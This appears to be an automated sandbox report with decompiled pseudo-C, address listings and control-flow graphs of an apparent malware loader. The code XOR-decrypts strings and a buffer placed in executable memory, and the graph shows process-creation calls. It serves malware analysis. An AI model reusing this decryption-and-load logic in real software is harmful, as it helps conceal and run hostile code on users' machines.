                                                          					 *((char*)(_t264 +  *(_t264 - 0x68) - 0x34)) =  *(_t264 + _t30) ^ 0x00000023;
                                                          					asm("int3");
                                                          					 *(_t264 - 0x68) =  *(_t264 - 0x68) + 1;
                                                          				}
                                                          				 *(_t264 - 0x68) = 0;
                                                          				while(1) {
                                                          					__eflags =  *(_t264 - 0x68) - 0x11;
                                                          					if( *(_t264 - 0x68) >= 0x11) {
                                                          						break;
                                                          					}
                                                          					_t40 =  *(_t264 - 0x68) - 0x48; // 0x64
                                                          					 *((char*)(_t264 +  *(_t264 - 0x68) - 0x48)) =  *(_t264 + _t40) ^ 0x00000023;
                                                          					_t219 =  *(_t264 - 0x68) + 1;
                                                          					__eflags = _t219;
                                                          					 *(_t264 - 0x68) = _t219;
                                                          				}
                                                          				 *(_t264 - 0x68) = 0;
                                                          				while(1) {
                                                          					__eflags =  *(_t264 - 0x68) - 0x1a;
                                                          					if( *(_t264 - 0x68) >= 0x1a) {
                                                          						break;
                                                          					}
                                                          					 *(_t264 +  *(_t264 - 0x68) - 0x64) =  *(_t264 +  *(_t264 - 0x68) - 0x64) ^ 0x00000023;
                                                          					asm("fisttp qword [ebp-0x17af63bb]");
                                                          					_t216 =  *(_t264 - 0x68) + 1;
                                                          					__eflags = _t216;
                                                          					 *(_t264 - 0x68) = _t216;
                                                          				}
                                                          				 *(_t264 - 0x74) = E00404187();
                                                          				_t56 = _t264 - 0x34; // 0x75
                                                          				 *((intOrPtr*)(_t264 - 0x78)) = E004042A7( *(_t264 - 0x74), _t56);
                                                          				_t59 = _t264 - 0x48; // 0x64
                                                          				_t226 =  *(_t264 - 0x74);
                                                          				 *((intOrPtr*)(_t264 - 0x7c)) = E004042A7(_t226, _t59);
                                                          				_t166 =  *((intOrPtr*)(_t264 - 8)) +  *((intOrPtr*)(_t264 - 0xc));
                                                          				__eflags = _t166;
                                                          				 *((intOrPtr*)(_t264 - 0x80)) = VirtualAlloc(0, _t166, 0x1000, 0x40);
                                                          				_t168 =  *((intOrPtr*)(_t264 - 0x7c))(0, _t264 - 0x64);
                                                          				do {
                                                          					__eflags =  *(_t226 - 0x837b) & _t226;
                                                          					__eflags =  *(_t258 + _t258 * 8 - 1) & _t258;
                                                          					_t258 = _t258 + 1;
                                                          					_t265 = _t264 + 1;
                                                          					_t169 = _t168;
                                                          					 *_t169 =  *_t169 + _t169;
                                                          					 *_t169 =  *_t169 + _t169;
                                                          					 *((intOrPtr*)(_t265 - 0x70)) =  *((intOrPtr*)(_t265 - 0x80));
                                                          					_t172 =  *((intOrPtr*)(_t265 - 0x84)) +  *((intOrPtr*)(_t265 - 4));
                                                          					__eflags = _t172;
                                                          					 *(_t265 - 0x6c) = _t172;
                                                          					while(1) {
                                                          						__eflags =  *(_t265 - 0x68) -  *((intOrPtr*)(_t265 - 8)) +  *((intOrPtr*)(_t265 - 0xc));
                                                          						if( *(_t265 - 0x68) >=  *((intOrPtr*)(_t265 - 8)) +  *((intOrPtr*)(_t265 - 0xc))) {
                                                          							break;
                                                          						}
                                                          						 *((char*)( *((intOrPtr*)(_t265 - 0x70)) +  *(_t265 - 0x68))) =  *((intOrPtr*)( *(_t265 - 0x6c) +  *(_t265 - 0x68)));
                                                          						 *(_t265 - 0x68) =  *(_t265 - 0x68) + 1;
                                                          					}
                                                          					_t175 =  *((intOrPtr*)(_t265 - 0x80));
                                                          					 *((intOrPtr*)(_t265 - 0x88)) = _t175;
                                                          					 *(_t265 - 0x68) = 0;
                                                          					_t227 =  *(_t265 - 0x68);
                                                          					_t264 = _t265 - 1;
                                                          					_t168 = _t175;
                                                          					__eflags = _t227;
                                                          					if(_t227 != 0) {
                                                          						goto L22;
                                                          					}
                                                          					L25:
                                                          					 *((intOrPtr*)(_t264 + 0xfffffffffffffe60)) =  *((intOrPtr*)(_t264 - 0x14));
                                                          					 *((intOrPtr*)(_t264 + 0xfffffffffffffe64)) =  *((intOrPtr*)(_t264 - 0x10));
                                                          					 *((intOrPtr*)(_t264 + 0xfffffffffffffe61)) =  *((intOrPtr*)(_t264 - 0x1c));
                                                          					 *((intOrPtr*)(_t264 + 0xbada11)) =  *((intOrPtr*)(_t264 - 0x18));
                                                          					_t107 = _t264 - 0x24; // 0xee354079
                                                          					 *((intOrPtr*)(_t264 + 0xfffffffffffffe61)) =  *_t107;
                                                          					 *((intOrPtr*)(_t264 + 0xbada11)) =  *((intOrPtr*)(_t264 - 0x20));
                                                          					_t113 = _t264 - 0x1a0; // 0xe449bebf
                                                          					_t114 = _t264 - 0x188; // 0xe449bed7
                                                          					E004043B7(_t114, _t113, 0x18);
                                                          					_t185 =  *((intOrPtr*)(_t264 - 8)) +  *((intOrPtr*)(_t264 - 0xc));
                                                          					__eflags =  *((intOrPtr*)(_t264 - 8)) +  *((intOrPtr*)(_t264 - 0xc));
                                                          					E00404497( *((intOrPtr*)(_t264 - 8)) +  *((intOrPtr*)(_t264 - 0xc)), _t264 - 0x188,  *((intOrPtr*)(_t264 - 0x70)), _t185);
                                                          					while(1) {
                                                          						__eflags =  *(_t264 - 0x68) -  *((intOrPtr*)(_t264 - 8));
                                                          						if( *(_t264 - 0x68) >=  *((intOrPtr*)(_t264 - 8))) {
                                                          							break;
                                                          						}
                                                          						_t237 =  *( *((intOrPtr*)(_t264 - 0x88)) +  *(_t264 - 0x68)) ^ 0x00000057;
                                                          						_t253 =  *((intOrPtr*)(_t264 - 0x88)) +  *(_t264 - 0x68);
                                                          						__eflags = _t253;
                                                          						_push(_t264);
                                                          						 *_t253 = _t237;
                                                          						 *(_t264 - 0x68) =  *(_t264 - 0x68) + 1;
                                                          					}
                                                          					 *(_t264 - 0x68) = 0;
                                                          					while(1) {
                                                          						__eflags =  *(_t264 - 0x68) -  *((intOrPtr*)(_t264 - 8));
                                                          						if( *(_t264 - 0x68) >=  *((intOrPtr*)(_t264 - 8))) {
                                                          							break;
                                                          						}
                                                          						 *( *((intOrPtr*)(_t264 - 0x88)) +  *(_t264 - 0x68)) =  *( *((intOrPtr*)(_t264 - 0x88)) +  *(_t264 - 0x68)) ^ 0x000000c4;
                                                          						 *(_t264 - 0x68) =  *(_t264 - 0x68) + 1;
                                                          					}
                                                          					 *((intOrPtr*)(_t264 - 0x1a4)) =  *((intOrPtr*)(_t264 - 0x80));
                                                          					 *((intOrPtr*)(_t264 - 0x1a8)) =  *((intOrPtr*)(_t264 - 0x80)) +  *((intOrPtr*)(_t264 - 8));
                                                          					 *(_t264 - 0x1ac) = _t264;
                                                          					__eflags =  *(_t264 - 0x1ac);
                                                          					if( *(_t264 - 0x1ac) == 0) {
                                                          						__eflags = 0;
                                                          						return 0;
                                                          					} else {
                                                          						_t194 =  *(_t264 - 0x1ac);
                                                          						_t233 =  *((intOrPtr*)(_t264 - 0x1a4));
                                                          						 *((intOrPtr*)(_t194 + 4)) = _t233;
                                                          						_t196 = _t194 - 1 + 0x8b;
                                                          						__eflags =  *(_t261 + _t258 * 8 - 1) & _t223;
                                                          						 *((intOrPtr*)(_t223 - 0x1a773)) =  *((intOrPtr*)(_t223 - 0x1a773)) - 1;
                                                          						_t153 = _t233 - 0x7a74f0b8;
                                                          						 *_t153 =  *(_t233 - 0x7a74f0b8) - 1;
                                                          						__eflags =  *_t153;
                                                          						if (__eflags != 0) goto 0x3e9c6c;
                                                          						_t155 = _t223 + 0x4889f44d;
                                                          						 *_t155 =  *(_t223 + 0x4889f44d) - 1;
                                                          						__eflags =  *_t155;
                                                          						_push(ss);
                                                          						return _t196;
                                                          					}
                                                          					L22:
                                                          					asm("outsb");
                                                          					asm("out dx, eax");
                                                          					_t226 = _t227 + _t227;
                                                          					__eflags = _t226;
                                                          					asm("bound eax, [ebp+0x5d]");
                                                          				} while (_t226 > 0);
                                                          				_push(_t261);
                                                          				asm("pushfd");
                                                          				_t93 = _t258;
                                                          				_t258 =  *[ds:eax+0x9ce34e4];
                                                          				 *[ds:eax+0x9ce34e4] = _t93;
                                                          				asm("invalid");
                                                          				 *0xb013c9d6 = 0x93;
                                                          				asm("lahf");
                                                          				asm("jecxz 0x7f");
                                                          				asm("aas");
                                                          				_t264 = 0xffffffffe449c05f;
                                                          				__eflags = 0x513594d4;
                                                          				goto L25;
                                                          			}























                                                          0x00403cfc
                                                          0x00403cfc
                                                          0x00403cfc
                                                          0x00403d00
                                                          0x00403d04
                                                          0x00403d08
                                                          0x00403d0c
                                                          0x00403d11
                                                          0x00403d12
                                                          0x00403d13
                                                          0x00403d14
                                                          0x00403d18
                                                          0x00403d1c
                                                          0x00403d20
                                                          0x00403d24
                                                          0x00403d28
                                                          0x00403d2c
                                                          0x00403d30
                                                          0x00403d34
                                                          0x00403d38
                                                          0x00403d3c
                                                          0x00403d40
                                                          0x00403d44
                                                          0x00403d48
                                                          0x00403d4c
                                                          0x00403d50
                                                          0x00403d54
                                                          0x00403d58
                                                          0x00403d5f
                                                          0x00403d71
                                                          0x00403d7a
                                                          0x00403d85
                                                          0x00403d88
                                                          0x00403d6e
                                                          0x00403d6e
                                                          0x00403d8b
                                                          0x00403d9d
                                                          0x00403d9d
                                                          0x00403da1
                                                          0x00000000
                                                          0x00000000
                                                          0x00403da6
                                                          0x00403db1
                                                          0x00403d97
                                                          0x00403d97
                                                          0x00403d9a
                                                          0x00403d9a
                                                          0x00403db7
                                                          0x00403dc9
                                                          0x00403dc9
                                                          0x00403dcd
                                                          0x00000000
                                                          0x00000000
                                                          0x00403ddd
                                                          0x00403de2
                                                          0x00403dc3
                                                          0x00403dc3
                                                          0x00403dc6
                                                          0x00403dc6
                                                          0x00403dec
                                                          0x00403def
                                                          0x00403dfc
                                                          0x00403dff
                                                          0x00403e03
                                                          0x00403e0c
                                                          0x00403e19
                                                          0x00403e19
                                                          0x00403e22
                                                          0x00403e27
                                                          0x00403e29
                                                          0x00403e29
                                                          0x00403e2b
                                                          0x00403e2f
                                                          0x00403e31
                                                          0x00403e32
                                                          0x00403e33
                                                          0x00403e35
                                                          0x00403e3a
                                                          0x00403e43
                                                          0x00403e43
                                                          0x00403e46
                                                          0x00403e49
                                                          0x00403e4f
                                                          0x00403e52
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e62
                                                          0x00403e6a
                                                          0x00403e6a
                                                          0x00403e6f
                                                          0x00403e72
                                                          0x00403e78
                                                          0x00403e7f
                                                          0x00403e80
                                                          0x00403e81
                                                          0x00403e82
                                                          0x00403e85
                                                          0x00000000
                                                          0x00000000
                                                          0x00403eba
                                                          0x00403ec5
                                                          0x00403ecf
                                                          0x00403ee1
                                                          0x00403eeb
                                                          0x00403efa
                                                          0x00403efd
                                                          0x00403f07
                                                          0x00403f10
                                                          0x00403f17
                                                          0x00403f1e
                                                          0x00403f26
                                                          0x00403f26
                                                          0x00403f35
                                                          0x00403f3a
                                                          0x00403f3d
                                                          0x00403f40
                                                          0x00000000
                                                          0x00000000
                                                          0x00403f4e
                                                          0x00403f57
                                                          0x00403f57
                                                          0x00403f58
                                                          0x00403f5a
                                                          0x00403f62
                                                          0x00403f62
                                                          0x00403f67
                                                          0x00403f6e
                                                          0x00403f71
                                                          0x00403f74
                                                          0x00000000
                                                          0x00000000
                                                          0x00403f91
                                                          0x00403f99
                                                          0x00403f99
                                                          0x00403fa1
                                                          0x00403fad
                                                          0x00403fb5
                                                          0x00403fbb
                                                          0x00403fc2
                                                          0x00403ff2
                                                          0x00403ffa
                                                          0x00403fc4
                                                          0x00403fc4
                                                          0x00403fca
                                                          0x00403fd0
                                                          0x00403fd2
                                                          0x00403fd4
                                                          0x00403fd8
                                                          0x00403fde
                                                          0x00403fde
                                                          0x00403fde
                                                          0x00403fe1
                                                          0x00403fe7
                                                          0x00403fe7
                                                          0x00403fe7
                                                          0x00403fed
                                                          0x00403ff1
                                                          0x00403ff1
                                                          0x00403e87
                                                          0x00403e87
                                                          0x00403e88
                                                          0x00403e89
                                                          0x00403e89
                                                          0x00403e8b
                                                          0x00403e8b
                                                          0x00403e90
                                                          0x00403e91
                                                          0x00403e92
                                                          0x00403e92
                                                          0x00403e92
                                                          0x00403e9a
                                                          0x00403ea1
                                                          0x00403eab
                                                          0x00403eac
                                                          0x00403eae
                                                          0x00403eb4
                                                          0x00403eb6
                                                          0x00000000

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00008000,00001000,00000040,?,dFWnLGVOFkBMGOFb#,?,uJQWVBObOOL@#,00000068), ref: 00403E1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: #$#$#$#$#$#$#$#$#$#$#$#$#$F$G$M$O$O$O$Q$dFWnLGVOFkBMGOFb#$uJQWVBObOOL@#$y@5
                                                          • API String ID: 4275171209-4115419081
                                                          • Opcode ID: 5ebb87bf78d45b5c031d0c1eb7753563c51c41fef1cb5d3c2df08c906f0ff980
                                                          • Instruction ID: e6bc0ae78d1f22013d6df193e1b5c635bc42909568071c41625d6076054c4d26
                                                          • Opcode Fuzzy Hash: 5ebb87bf78d45b5c031d0c1eb7753563c51c41fef1cb5d3c2df08c906f0ff980
                                                          • Instruction Fuzzy Hash: A2B1C471D08288CFEB11CFA8C494BDDBFB4AF56309F1440AAD549AB382C7799A84CF55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 74 403de2-403df6 75 403dfc-403e25 call 4042a7 VirtualAlloc 74->75 76 403df7 call 4042a7 74->76 79 403e29-403e46 75->79 76->75 80 403e49-403e52 79->80 81 403e54-403e6d 80->81 82 403e6f-403e85 80->82 81->80 83 403e87-403e8e 82->83 84 403eba-403f35 call 4043b7 call 404497 82->84 83->79 85 403e90-403e99 83->85 89 403f3a-403f40 84->89 85->84 90 403f42-403f65 89->90 91 403f67 89->91 90->89 92 403f6e-403f74 91->92 93 403f76-403f9c 92->93 94 403f9e-403fc2 92->94 93->92 95 403ff2-403ffa 94->95 96 403fc4-403feb 94->96 96->95
                                                          C-Code - Quality: 68%
                                                          			E00403DE2(signed int __ebx, signed int __edi) {
                                                          				long _t122;
                                                          				intOrPtr* _t124;
                                                          				intOrPtr* _t125;
                                                          				signed int _t128;
                                                          				intOrPtr* _t131;
                                                          				signed int _t150;
                                                          				void* _t152;
                                                          				signed int _t171;
                                                          				signed char _t174;
                                                          				signed int _t175;
                                                          				intOrPtr _t181;
                                                          				signed int _t185;
                                                          				signed int _t197;
                                                          				signed int _t200;
                                                          				void* _t202;
                                                          				signed int _t204;
                                                          				void* _t205;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					_t200 = __edi;
                                                          					_t171 = __ebx;
                                                          					asm("fisttp qword [ebp-0x17af63bb]");
                                                          					L1:
                                                          					 *(_t204 - 0x68) =  *(_t204 - 0x68) + 1;
                                                          					L2:
                                                          					if( *(_t204 - 0x68) < 0x1a) {
                                                          						L3:
                                                          						 *(_t204 +  *(_t204 - 0x68) - 0x64) =  *(_t204 +  *(_t204 - 0x68) - 0x64) ^ 0x00000023;
                                                          						continue;
                                                          					}
                                                          					L4:
                                                          					 *(_t204 - 0x74) = E00404187();
                                                          					_t12 = _t204 - 0x34; // 0x75
                                                          					 *((intOrPtr*)(_t204 - 0x78)) = E004042A7( *(_t204 - 0x74), _t12);
                                                          					_t15 = _t204 - 0x48; // 0x64
                                                          					_t174 =  *(_t204 - 0x74);
                                                          					 *((intOrPtr*)(_t204 - 0x7c)) = E004042A7(_t174, _t15);
                                                          					_t122 =  *((intOrPtr*)(_t204 - 8)) +  *((intOrPtr*)(_t204 - 0xc));
                                                          					__eflags = _t122;
                                                          					 *((intOrPtr*)(_t204 - 0x80)) = VirtualAlloc(0, _t122, 0x1000, 0x40);
                                                          					_t124 =  *((intOrPtr*)(_t204 - 0x7c))(0, _t204 - 0x64);
                                                          					do {
                                                          						L5:
                                                          						__eflags =  *(_t174 - 0x837b) & _t174;
                                                          						L6:
                                                          						__eflags =  *(_t200 + _t200 * 8 - 1) & _t200;
                                                          						_t200 = _t200 + 1;
                                                          						_t205 = _t204 + 1;
                                                          						_t125 = _t124;
                                                          						 *_t125 =  *_t125 + _t125;
                                                          						 *_t125 =  *_t125 + _t125;
                                                          						 *((intOrPtr*)(_t205 - 0x70)) =  *((intOrPtr*)(_t205 - 0x80));
                                                          						_t128 =  *((intOrPtr*)(_t205 - 0x84)) +  *((intOrPtr*)(_t205 - 4));
                                                          						__eflags = _t128;
                                                          						 *(_t205 - 0x6c) = _t128;
                                                          						while(1) {
                                                          							L7:
                                                          							__eflags =  *(_t205 - 0x68) -  *((intOrPtr*)(_t205 - 8)) +  *((intOrPtr*)(_t205 - 0xc));
                                                          							if( *(_t205 - 0x68) >=  *((intOrPtr*)(_t205 - 8)) +  *((intOrPtr*)(_t205 - 0xc))) {
                                                          								break;
                                                          							}
                                                          							L8:
                                                          							 *((char*)( *((intOrPtr*)(_t205 - 0x70)) +  *(_t205 - 0x68))) =  *((intOrPtr*)( *(_t205 - 0x6c) +  *(_t205 - 0x68)));
                                                          							 *(_t205 - 0x68) =  *(_t205 - 0x68) + 1;
                                                          						}
                                                          						L9:
                                                          						_t131 =  *((intOrPtr*)(_t205 - 0x80));
                                                          						 *((intOrPtr*)(_t205 - 0x88)) = _t131;
                                                          						 *(_t205 - 0x68) = 0;
                                                          						_t175 =  *(_t205 - 0x68);
                                                          						L10:
                                                          						_t204 = _t205 - 1;
                                                          						_t124 = _t131;
                                                          						__eflags = _t175;
                                                          						if(_t175 != 0) {
                                                          							goto L11;
                                                          						}
                                                          						L14:
                                                          						 *((intOrPtr*)(_t204 + 0xfffffffffffffe60)) =  *((intOrPtr*)(_t204 - 0x14));
                                                          						 *((intOrPtr*)(_t204 + 0xfffffffffffffe64)) =  *((intOrPtr*)(_t204 - 0x10));
                                                          						 *((intOrPtr*)(_t204 + 0xfffffffffffffe61)) =  *((intOrPtr*)(_t204 - 0x1c));
                                                          						 *((intOrPtr*)(_t204 + 0xbada11)) =  *((intOrPtr*)(_t204 - 0x18));
                                                          						_t63 = _t204 - 0x24; // 0xee354079
                                                          						 *((intOrPtr*)(_t204 + 0xfffffffffffffe61)) =  *_t63;
                                                          						 *((intOrPtr*)(_t204 + 0xbada11)) =  *((intOrPtr*)(_t204 - 0x20));
                                                          						_t69 = _t204 - 0x1a0; // 0xe449bebf
                                                          						_t70 = _t204 - 0x188; // 0xe449bed7
                                                          						E004043B7(_t70, _t69, 0x18);
                                                          						_t141 =  *((intOrPtr*)(_t204 - 8)) +  *((intOrPtr*)(_t204 - 0xc));
                                                          						__eflags =  *((intOrPtr*)(_t204 - 8)) +  *((intOrPtr*)(_t204 - 0xc));
                                                          						E00404497( *((intOrPtr*)(_t204 - 8)) +  *((intOrPtr*)(_t204 - 0xc)), _t204 - 0x188,  *((intOrPtr*)(_t204 - 0x70)), _t141);
                                                          						while(1) {
                                                          							L15:
                                                          							__eflags =  *(_t204 - 0x68) -  *((intOrPtr*)(_t204 - 8));
                                                          							if( *(_t204 - 0x68) >=  *((intOrPtr*)(_t204 - 8))) {
                                                          								break;
                                                          							}
                                                          							L16:
                                                          							_t185 =  *( *((intOrPtr*)(_t204 - 0x88)) +  *(_t204 - 0x68)) ^ 0x00000057;
                                                          							_t197 =  *((intOrPtr*)(_t204 - 0x88)) +  *(_t204 - 0x68);
                                                          							__eflags = _t197;
                                                          							L17:
                                                          							_push(_t204);
                                                          							 *_t197 = _t185;
                                                          							 *(_t204 - 0x68) =  *(_t204 - 0x68) + 1;
                                                          						}
                                                          						L18:
                                                          						 *(_t204 - 0x68) = 0;
                                                          						while(1) {
                                                          							L19:
                                                          							__eflags =  *(_t204 - 0x68) -  *((intOrPtr*)(_t204 - 8));
                                                          							if( *(_t204 - 0x68) >=  *((intOrPtr*)(_t204 - 8))) {
                                                          								break;
                                                          							}
                                                          							L20:
                                                          							 *( *((intOrPtr*)(_t204 - 0x88)) +  *(_t204 - 0x68)) =  *( *((intOrPtr*)(_t204 - 0x88)) +  *(_t204 - 0x68)) ^ 0x000000c4;
                                                          							 *(_t204 - 0x68) =  *(_t204 - 0x68) + 1;
                                                          						}
                                                          						L21:
                                                          						 *((intOrPtr*)(_t204 - 0x1a4)) =  *((intOrPtr*)(_t204 - 0x80));
                                                          						 *((intOrPtr*)(_t204 - 0x1a8)) =  *((intOrPtr*)(_t204 - 0x80)) +  *((intOrPtr*)(_t204 - 8));
                                                          						 *(_t204 - 0x1ac) = _t204;
                                                          						__eflags =  *(_t204 - 0x1ac);
                                                          						if( *(_t204 - 0x1ac) == 0) {
                                                          							L25:
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						} else {
                                                          							L22:
                                                          							_t150 =  *(_t204 - 0x1ac);
                                                          							_t181 =  *((intOrPtr*)(_t204 - 0x1a4));
                                                          							 *((intOrPtr*)(_t150 + 4)) = _t181;
                                                          							L23:
                                                          							_t152 = _t150 - 1 + 0x8b;
                                                          							__eflags =  *(_t202 + _t200 * 8 - 1) & _t171;
                                                          							 *((intOrPtr*)(_t171 - 0x1a773)) =  *((intOrPtr*)(_t171 - 0x1a773)) - 1;
                                                          							_t109 = _t181 - 0x7a74f0b8;
                                                          							 *_t109 =  *(_t181 - 0x7a74f0b8) - 1;
                                                          							__eflags =  *_t109;
                                                          							L24:
                                                          							if (__eflags != 0) goto 0x3e9c6c;
                                                          							_t111 = _t171 + 0x4889f44d;
                                                          							 *_t111 =  *(_t171 + 0x4889f44d) - 1;
                                                          							__eflags =  *_t111;
                                                          							_push(ss);
                                                          							return _t152;
                                                          						}
                                                          						L26:
                                                          						L11:
                                                          						asm("outsb");
                                                          						asm("out dx, eax");
                                                          						_t174 = _t175 + _t175;
                                                          						__eflags = _t174;
                                                          						asm("bound eax, [ebp+0x5d]");
                                                          					} while (_t174 > 0);
                                                          					_push(_t202);
                                                          					asm("pushfd");
                                                          					_t49 = _t200;
                                                          					_t200 =  *[ds:eax+0x9ce34e4];
                                                          					 *[ds:eax+0x9ce34e4] = _t49;
                                                          					asm("invalid");
                                                          					L13:
                                                          					 *0xb013c9d6 = 0x93;
                                                          					asm("lahf");
                                                          					asm("jecxz 0x7f");
                                                          					asm("aas");
                                                          					_t204 = 0xffffffffe449c05f;
                                                          					__eflags = 0x513594d4;
                                                          					goto L14;
                                                          				}
                                                          			}




















                                                          0x00403de2
                                                          0x00403de2
                                                          0x00403de2
                                                          0x00403de2
                                                          0x00403de2
                                                          0x00403de2
                                                          0x00403dc0
                                                          0x00403dc6
                                                          0x00403dc9
                                                          0x00403dcd
                                                          0x00403dcf
                                                          0x00403ddd
                                                          0x00000000
                                                          0x00403ddd
                                                          0x00403de3
                                                          0x00403dec
                                                          0x00403def
                                                          0x00403dfc
                                                          0x00403dff
                                                          0x00403e03
                                                          0x00403e0c
                                                          0x00403e19
                                                          0x00403e19
                                                          0x00403e22
                                                          0x00403e27
                                                          0x00403e29
                                                          0x00403e29
                                                          0x00403e29
                                                          0x00403e2b
                                                          0x00403e2b
                                                          0x00403e2f
                                                          0x00403e31
                                                          0x00403e32
                                                          0x00403e33
                                                          0x00403e35
                                                          0x00403e3a
                                                          0x00403e43
                                                          0x00403e43
                                                          0x00403e46
                                                          0x00403e49
                                                          0x00403e49
                                                          0x00403e4f
                                                          0x00403e52
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e54
                                                          0x00403e62
                                                          0x00403e6a
                                                          0x00403e6a
                                                          0x00403e6f
                                                          0x00403e6f
                                                          0x00403e72
                                                          0x00403e78
                                                          0x00403e7f
                                                          0x00403e80
                                                          0x00403e80
                                                          0x00403e81
                                                          0x00403e82
                                                          0x00403e85
                                                          0x00000000
                                                          0x00000000
                                                          0x00403eba
                                                          0x00403ec5
                                                          0x00403ecf
                                                          0x00403ee1
                                                          0x00403eeb
                                                          0x00403efa
                                                          0x00403efd
                                                          0x00403f07
                                                          0x00403f10
                                                          0x00403f17
                                                          0x00403f1e
                                                          0x00403f26
                                                          0x00403f26
                                                          0x00403f35
                                                          0x00403f3a
                                                          0x00403f3a
                                                          0x00403f3d
                                                          0x00403f40
                                                          0x00000000
                                                          0x00000000
                                                          0x00403f42
                                                          0x00403f4e
                                                          0x00403f57
                                                          0x00403f57
                                                          0x00403f58
                                                          0x00403f58
                                                          0x00403f5a
                                                          0x00403f62
                                                          0x00403f62
                                                          0x00403f67
                                                          0x00403f67
                                                          0x00403f6e
                                                          0x00403f6e
                                                          0x00403f71
                                                          0x00403f74
                                                          0x00000000
                                                          0x00000000
                                                          0x00403f76
                                                          0x00403f91
                                                          0x00403f99
                                                          0x00403f99
                                                          0x00403f9e
                                                          0x00403fa1
                                                          0x00403fad
                                                          0x00403fb5
                                                          0x00403fbb
                                                          0x00403fc2
                                                          0x00403ff2
                                                          0x00403ff2
                                                          0x00403ffa
                                                          0x00403fc4
                                                          0x00403fc4
                                                          0x00403fc4
                                                          0x00403fca
                                                          0x00403fd0
                                                          0x00403fd1
                                                          0x00403fd2
                                                          0x00403fd4
                                                          0x00403fd8
                                                          0x00403fde
                                                          0x00403fde
                                                          0x00403fde
                                                          0x00403fe1
                                                          0x00403fe1
                                                          0x00403fe7
                                                          0x00403fe7
                                                          0x00403fe7
                                                          0x00403fed
                                                          0x00403ff1
                                                          0x00403ff1
                                                          0x00000000
                                                          0x00403e87
                                                          0x00403e87
                                                          0x00403e88
                                                          0x00403e89
                                                          0x00403e89
                                                          0x00403e8b
                                                          0x00403e8b
                                                          0x00403e90
                                                          0x00403e91
                                                          0x00403e92
                                                          0x00403e92
                                                          0x00403e92
                                                          0x00403e9a
                                                          0x00403e9c
                                                          0x00403ea1
                                                          0x00403eab
                                                          0x00403eac
                                                          0x00403eae
                                                          0x00403eb4
                                                          0x00403eb6
                                                          0x00000000
                                                          0x00403eb6

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,00008000,00001000,00000040,?,dFWnLGVOFkBMGOFb#,?,uJQWVBObOOL@#,00000068), ref: 00403E1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: dFWnLGVOFkBMGOFb#$uJQWVBObOOL@#
                                                          • API String ID: 4275171209-32457125
                                                          • Opcode ID: 9a435683e006fc2200f94c214ff02a7fea3549497dd79e23f24808265594c5bd
                                                          • Instruction ID: 28eac0dd6a60f70cb0f7fb81e1a4c1d8d0000c78f9a7ce57a617be8f1ae4712d
                                                          • Opcode Fuzzy Hash: 9a435683e006fc2200f94c214ff02a7fea3549497dd79e23f24808265594c5bd
                                                          • Instruction Fuzzy Hash: 3D11A275D04208DFDB64CFA8C881B9DBBB5BF09309F2401A9E609AB282DB35A940CF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 97 402050-402143 call 409280 * 5 call 401800 110 402881-402925 LoadIconW * 2 LoadCursorW RegisterClassExW CreateDialogParamW GetMessageW 97->110 111 402149-402167 call 40346a 97->111 113 402927-402935 IsDialogMessageW 110->113 114 40295e 110->114 111->110 119 40216d-40217f call 40346a 111->119 116 402937-402947 TranslateMessage DispatchMessageW 113->116 117 40294d-40295c GetMessageW 113->117 118 402966-402989 LocalFree call 40318a 114->118 116->117 117->113 117->114 124 402185-40218c 119->124 125 40227f-402291 call 40346a 119->125 127 4023a1-4023d1 call 4036e5 call 4029c0 124->127 128 402192-4021a9 call 40346a 124->128 132 4022d0-4022e2 call 40346a 125->132 133 402293-402296 125->133 152 4023d3-4023e1 call 401880 127->152 153 4023e6-40240e call 402f60 127->153 138 4021ab-4021b8 SetEnvironmentVariableW 128->138 139 4021be-4021c0 128->139 147 402321-402333 call 40346a 132->147 148 4022e4-4022e7 132->148 136 4022b3 133->136 137 402298-4022b1 call 40346a 133->137 144 4022b7-4022cb call 401ba0 136->144 137->136 137->144 138->139 139->127 145 4021c6-40226a call 409280 call 4036e5 call 40366b CreateProcessW 139->145 144->118 145->118 184 402270-40227a GetLastError 145->184 170 402370-402382 call 40346a 147->170 171 402335-402338 147->171 155 402304 148->155 156 4022e9-402302 call 40346a 148->156 152->118 153->118 168 402414-40248e call 409280 * 3 call 402cb0 153->168 164 402308-40231c call 401ba0 155->164 156->155 156->164 164->118 168->118 197 402494-4024f6 CreateProcessWithLogonW 168->197 170->127 186 402384-40238c 170->186 177 402355 171->177 178 40233a-402353 call 40346a 171->178 180 402359-40236b call 401930 177->180 178->177 178->180 180->118 184->118 190 40239e 186->190 191 40238e-40239a 186->191 190->127 191->190 198 402504-402506 197->198 199 4024f8-402502 GetLastError 197->199 200 40254b-402553 198->200 201 402508-402531 call 403926 call 40360d 198->201 199->200 200->168 203 402559-402561 200->203 201->200 210 402533-402545 EnumWindows 201->210 203->168 205 402567-40256f 203->205 205->168 207 402575-40257d 205->207 207->168 209 402583-402588 207->209 209->168 211 40258e-402596 209->211 210->200 212 402835-40283f 210->212 211->168 213 40259c-4025a4 211->213 214 402840-402845 212->214 213->168 215 4025aa-4025b2 213->215 216 402847-40284e 214->216 217 402868-40287c CloseHandle * 2 214->217 215->168 218 4025b8-4025bd 215->218 216->217 220 402850-402866 Sleep EnumWindows 216->220 217->118 218->168 219 4025c3-4025cb 218->219 219->168 221 4025d1-4025d9 219->221 